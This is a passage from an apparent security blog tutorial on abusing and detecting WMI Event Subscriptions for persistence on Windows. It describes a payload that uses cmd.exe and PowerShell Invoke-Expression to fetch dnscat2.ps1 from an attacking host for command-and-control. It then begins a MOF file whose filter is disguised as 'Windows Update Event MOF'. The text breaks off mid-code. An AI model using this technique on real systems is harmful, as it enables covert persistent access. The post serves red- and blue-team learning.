An intro into abusing and identifying WMI Event Subscriptions for persistence
Overview
Windows Management Instrumentation (WMI) Event Subscriptions are one of many ways to establish persistence on a network. The technique, IDT1084 on Mitre ATT&CK, can be fairly discreet and has been used by APT29 to establish backdoors. We’re not going to dig into too much detail about WMI Event Subscriptions themselves, as some good material on the subject already exists:
- PowerShell and Events - Permanent WMI Event Subscriptions
- Fuzzy Security Tutorial
- Blackhat Paper on Abusing WMI
- Detecting and Removing WMI Persistence
In this post, we’ll give an example using MOF files and PowerShell to create the WMI Event Subscription, then we’ll take a look at some events generated by our actions.
So, why are we looking into WMI Event Subscriptions?
- From the red team perspective – they’re a useful way to achieve persistence and can be adapted to achieve a multitude of objectives.
- From the blue team perspective – increasing awareness of how they may be abused and how to catch this activity.
Part 1a: Abuse (mofcomp.exe)
There are a number of ways to perform this attack, and it’s probably fair to say that using MOF (Managed Object Format) files are one of the more favored options by red teamers.
As previously mentioned, there are a number of useful resources out there that explain the inner workings of WMI Event Subscriptions. Thanks to Fuzzy Security and Hunting Malware, we have a base for the MOF file and some understanding of the construction.
In the following example, we’re going to use a payload that’ll initially call cmd.exe which in turn executes powershell.exe to use Invoke-Expression to contact the attacking host 10.133.251.104. This will then execute the PowerShell script dnscat2.ps1 in memory and communicate with the dnscat2 server we have listening on the attacking host. We’ll talk about the triggers shortly. This may not be the most discreet payload, but it works well for visualizing the attack.
#PRAGMA NAMESPACE (“\\.\root\subscription”)
instance of __EventFilter as $EventFilter
{
Name = “Windows Update Event MOF“;
EventNamespace = “root\cimv2”;
Query = “SELECT * FROM __InstanceCreationEvent WITHIN 5”
“WHERE TargetInstance ISA \